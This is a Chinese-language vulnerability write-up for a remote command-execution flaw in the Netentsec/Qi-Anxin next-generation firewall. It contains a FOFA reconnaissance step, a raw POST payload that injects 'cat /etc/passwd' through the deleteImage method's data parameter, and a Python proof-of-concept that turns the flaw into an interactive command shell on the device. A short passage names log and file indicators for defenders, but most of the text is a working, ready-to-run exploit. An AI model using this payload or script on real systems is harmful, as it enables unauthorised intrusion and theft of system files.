简介
网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。
漏洞概述
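该产品存在远程命令执行漏洞,攻击者可以借此获取服务器权限。从下文的复现请求可以看出,注入点位于 /directdata/direct/router 接口中 SSLVPN_Resource 的 deleteImage 方法:data 参数里分号之后的内容会被当作系统命令执行。防守方可据此在访问日志中排查发往该接口、且 data 字段含有分号等 shell 元字符的 POST 请求,并检查 /var/www/html 下是否出现来历不明的文件(如 test.txt)。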
影响范围
奇安信 网康下一代防火墙
FOFA
复现过程
fofa搜索:
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNfRHLGZkRGZkRfJ3bs92YsYTMfVmepNHL4VEVOlXU65UMRpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL2IDO3UjMycTM0EDNwEjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
登录页面:
使用burpsuite进行抓包,并构造数据包:
变更发包方式:POST /directdata/direct/router HTTP/1.1
添加POST数据:{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
访问test.txt获得数据:
反弹shell
POC
# @Author:ximo
import requests
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
    """Print the three-line banner naming the product this script checks."""
    banner_rows = (
        '+------------------------------------------',
        '+----------奇安信 网康下一代防火墙-------------',
        '+------------------------------------------',
    )
    for row in banner_rows:
        print(row)
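def poc_1(target_url):  # check whether the target is vulnerable
    """Probe ``target_url`` for the ``deleteImage`` command-injection issue.

    Sends one POST to ``/directdata/direct/router`` whose ``deleteImage``
    argument carries ``;cat /etc/passwd >/var/www/html/test.txt`` after the
    file name, waits three seconds, then fetches ``/test.txt`` and looks for
    the root entry of ``/etc/passwd`` in the response. When both checks pass
    the operator is offered a prompt that forwards each line to ``poc_2``
    until ``exit`` is typed.

    Side effects worth knowing when reviewing a device this was run against:
    the probe leaves ``/var/www/html/test.txt`` behind (nothing in this
    script removes it), so the file and the POST to the router endpoint are
    both usable as indicators in logs and on disk.

    Args:
        target_url: Base URL of the device, without the endpoint path.

    Returns:
        None. Results are printed.
    """
    vuln_url = target_url + '/directdata/direct/router'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
        "Content-Type": "application/json",
    }
    data = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}'

    # verify=False is used below, so certificate validation is off and urllib3
    # would warn on every request; one call silences it for the process.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    # NOTE(review): the indentation of the original listing was lost, so it is
    # unclear which `if` the "not vulnerable" branch belonged to. Both failed
    # checks report it here — confirm against the author's original.
    try:
        # First request: the injected command redirects its output to test.txt.
        response1 = requests.post(url=vuln_url, headers=headers, data=data,
                                  verify=False, timeout=5)
        accepted = (response1.status_code == 200
                    and '"result":{"success":true}' in response1.text)
        if not accepted:
            print('目标不存在漏洞')
            return

        print('目标{}可能存在漏洞,正在执行 cat /etc/passwd'.format(target_url))
        time.sleep(3)

        # Second request: read back the file the injected command wrote.
        # A timeout is set so an unresponsive device cannot hang the script.
        response2 = requests.get(url=target_url + '/test.txt', headers=headers,
                                 verify=False, timeout=5)
        confirmed = (response2.status_code == 200
                     and 'root:x:0:0:root:/root:/bin/bash' in response2.text)
        if not confirmed:
            print('目标不存在漏洞')
            return

        print('结果为:\n{}'.format(response2.text))
    except requests.RequestException:
        # Only transport-level failures are reported as a failed request;
        # programming errors are no longer hidden behind this message.
        print('请求失败')
        return

    # Forward further operator input to poc_2 until "exit" is entered.
    while True:
        cmd = input('输入想要执行的命令,输入exit退出\nCmd>>>')
        if cmd == 'exit':
            break
        poc_2(target_url, cmd)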
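def poc_2(target_url, cmd):  # run one operator-supplied command
    """Send ``cmd`` through the ``deleteImage`` request and print its output.

    ``cmd`` is interpolated verbatim into the JSON request text after the
    ``;`` that follows the file name, with its output redirected to
    ``/var/www/html/test.txt``. After a three-second wait the function
    fetches ``/test.txt`` and prints whatever the device returns.

    The output file is left on the device; nothing in this script removes it.

    Args:
        target_url: Base URL of the device, without the endpoint path.
        cmd: Command line entered by the operator.

    Returns:
        None. Results are printed.
    """
    vuln_url = target_url + '/directdata/direct/router'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
        "Content-Type": "application/json",
    }
    data = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;%s >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}' % (cmd)

    # verify=False is used below; silence the resulting urllib3 warning once.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    try:
        # First request: the command's output is redirected into test.txt.
        response1 = requests.post(url=vuln_url, headers=headers, data=data,
                                  verify=False, timeout=5)
        accepted = (response1.status_code == 200
                    and '"result":{"success":true}' in response1.text)
        if not accepted:
            # Previously this case printed nothing, which looked like a hang.
            print('请求失败')
            return

        print('正在执行 {}'.format(cmd))
        time.sleep(3)

        # Second request: read the output file back. The status code is not
        # checked here, so an error page would be printed as-is.
        # A timeout is set so an unresponsive device cannot hang the script.
        response2 = requests.get(url=target_url + '/test.txt', headers=headers,
                                 verify=False, timeout=5)
        print('结果为:\n{}'.format(response2.text))
    except requests.RequestException:
        # Only transport-level failures are reported as a failed request.
        print('请求失败')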
if __name__ == '__main__':
    # Show the banner, read the base URL of the device under test from the
    # operator (the prompt is wrapped in ANSI colour codes), then run the check.
    title()
    url_prompt = "\033[35m请输入url\nUrl >>> \033[0m"
    target_url = str(input(url_prompt))
    poc_1(target_url)